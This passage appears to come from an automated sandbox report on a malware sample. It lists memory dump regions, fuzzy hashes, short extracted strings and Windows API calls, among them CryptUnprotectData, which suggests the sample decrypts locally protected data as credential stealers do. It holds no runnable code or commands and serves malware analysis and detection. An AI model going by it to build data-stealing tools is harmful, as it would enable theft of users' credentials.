                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: f68e6ad85df6e7ab84f02d33e92a4e7da576ebd8cc43bda30972d881d75a09fa
                      • Instruction ID: a7cf12613b4c50359fef73a6be71865e661c71ca11e12f8b6fcc98fa87c65483
                      • Opcode Fuzzy Hash: f68e6ad85df6e7ab84f02d33e92a4e7da576ebd8cc43bda30972d881d75a09fa
                      • Instruction Fuzzy Hash: E8111575200209BFDB04DF64E884FAB33AAAF89304F109559F919CB350DB35EC51DB64
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                      • LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID:
                      • API String ID: 4291131564-0
                      • Opcode ID: 918366f13810bf1bed43cc75e78be7e4f7a4b6129e403016e904d89bce82778a
                      • Instruction ID: 607cd64af8a8b2a36ecf048b1535d01c43af8dfae916c054589213be2bd32b18
                      • Opcode Fuzzy Hash: 918366f13810bf1bed43cc75e78be7e4f7a4b6129e403016e904d89bce82778a
                      • Instruction Fuzzy Hash: D211A2B5240308BFEB10CF64DD95FAA77B5FB89704F208058F915AB390C7B6A911CB94
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E3E4F0,00000000,?,001E0E10,00000000,?,00000000,00000000), ref: 001D7A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D7A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E3E4F0,00000000,?,001E0E10,00000000,?,00000000,00000000,?), ref: 001D7A7D
                      • wsprintfA.USER32 ref: 001D7AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: dcfb6508bcaae969f24a71aeee81b4c35530fe27dce560483f899ddd592f6027
                      • Instruction ID: 0b40b9285c37234a04c1b47a21be190a19856535432bc3ba53c8acc7f1b36941
                      • Opcode Fuzzy Hash: dcfb6508bcaae969f24a71aeee81b4c35530fe27dce560483f899ddd592f6027
                      • Instruction Fuzzy Hash: 36118EB1A45218EBEB20DB54DD49FA9B778FB04721F1047AAE90AA32C0D7741A40CF51
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: {Li$}]v[$~)w
                      • API String ID: 0-4223912085
                      • Opcode ID: b6d89732e3f7c9add614097aaec272f34e8be778ab39d581a007c5ccd2a29266
                      • Instruction ID: 7559ffc2f97875f227ab61d4b70b33059d9bdcad281b51ad0e54ab5a11a58d30
                      • Opcode Fuzzy Hash: b6d89732e3f7c9add614097aaec272f34e8be778ab39d581a007c5ccd2a29266
                      • Instruction Fuzzy Hash: FCB23BF360C2049FE304AE2DEC8567ABBE9EFD4720F16853DE6C4C7744EA3598058696
                      APIs
                      • CoCreateInstance.COMBASE(001DE118,00000000,00000001,001DE108,00000000), ref: 001D3758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001D37B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: 747a0b9ec02127b3c0747d24b522813899864f981a879e55ee25e355fb44e5aa
                      • Instruction ID: 7f97fe5ee46e4443883450800fb95f9294fe1078f2ebc27362e32e31d16150b9
                      • Opcode Fuzzy Hash: 747a0b9ec02127b3c0747d24b522813899864f981a879e55ee25e355fb44e5aa
                      • Instruction Fuzzy Hash: 7941FB70A00A189FDB24DB58CC95B9BB7B4BB48702F4042D9E618E72D0D771AE85CF51
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001C9B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 001C9BA3
                      • LocalFree.KERNEL32(?), ref: 001C9BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 3f/
                      • API String ID: 0-2500111303
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: rHmm$sG|
                      • API String ID: 0-3568970663
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ?%T4$er$^
                      • API String ID: 0-4237381662
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 2u/
                      • API String ID: 0-1944481109
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ?|{=
                      • API String ID: 0-1078217459
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ?u{
                      • API String ID: 0-4083307101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 3Ku
                      • API String ID: 0-584950876
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Z?O
                      • API String ID: 0-4106869805
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: [3|w
                      • API String ID: 0-1452203539
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f337f3ece2ec8dcebd0cf3aa82914cd24e11a373db1373b1e8922d724ebc6366
                      • Instruction ID: e87797c9772b0575f0c94b157aafcb532f1825fbfa9c7b0b5f3f42f3b4173978
                      • Opcode Fuzzy Hash: f337f3ece2ec8dcebd0cf3aa82914cd24e11a373db1373b1e8922d724ebc6366
                      • Instruction Fuzzy Hash: 5F5108F3A0C1109FF718AE19EC8177AB7E5EB94320F16493DEBD897380EA3558148796
                      Memory Dump Source
                      • Source File: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce98a7f2e3fce2af0e64ed67d05cc89a0116494108e5174e9f1e9240556ed783
                      • Instruction ID: ab0eb0f84575a37a8c6a6f18927b85de5f92926f9726801a8dabc284d8ab22ce
                      • Opcode Fuzzy Hash: ce98a7f2e3fce2af0e64ed67d05cc89a0116494108e5174e9f1e9240556ed783
                      • Instruction Fuzzy Hash: 834119F26092149FE314AF18EC457BBBBE5EF84361F25853DEAC4C3740EA3658048696
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 982fb1d604e6618b48778b8f70488abfc8be5374fa5acd5181868f1a2e7916ad
                      • Instruction ID: 29e5d8e3665d7506da27250a40f0505cc81ccc8db6f352bc0f560cfe7c7e6555
                      • Opcode Fuzzy Hash: 982fb1d604e6618b48778b8f70488abfc8be5374fa5acd5181868f1a2e7916ad
                      • Instruction Fuzzy Hash: ED416AF3A08204ABF350A92DEC8177BB3DAEBD0310F2AC53C9B94D3744E97959058696
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 819291e180368cbb42a35f7ad5f78001d303ed16e13b60d87e1abffaffbeac0a
                      • Instruction ID: c8349672ff784daaa4df39e3170f2d5045fae501f078110d6a1cd2a5d1c55a3f
                      • Opcode Fuzzy Hash: 819291e180368cbb42a35f7ad5f78001d303ed16e13b60d87e1abffaffbeac0a
                      • Instruction Fuzzy Hash: 22412AF3A082085BE310AE2AEC5577BB6D6EBD4330F1AC63EDA84C7784F97958054151
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a22c8741bf930eedfb3cbb03acd850ef64aee49d4b3ce839449eb882b3b497e7
                      • Instruction ID: 987601e3390901d124fb730abeb29472c7ce1efe25e7878b406601e15d05e6b2
                      • Opcode Fuzzy Hash: a22c8741bf930eedfb3cbb03acd850ef64aee49d4b3ce839449eb882b3b497e7
                      • Instruction Fuzzy Hash: 9D31C2B280C710DFD755AF29D8816BAFBE5EF94720F06482DDAC893620E73558908B87
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 57409b77370bb2236c51a928332115a8e7378151ac08ca8a4c44e90dcc1a060b
                      • Instruction ID: c7eff42bdb24adc7ff89f8815b46013d35020e6fd16954c092197086d91b8758
                      • Opcode Fuzzy Hash: 57409b77370bb2236c51a928332115a8e7378151ac08ca8a4c44e90dcc1a060b
                      • Instruction Fuzzy Hash: 0A3124B250C704AFE315BF19E88566AFBE5FF98320F16882DE6C483210E7356544DA87
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
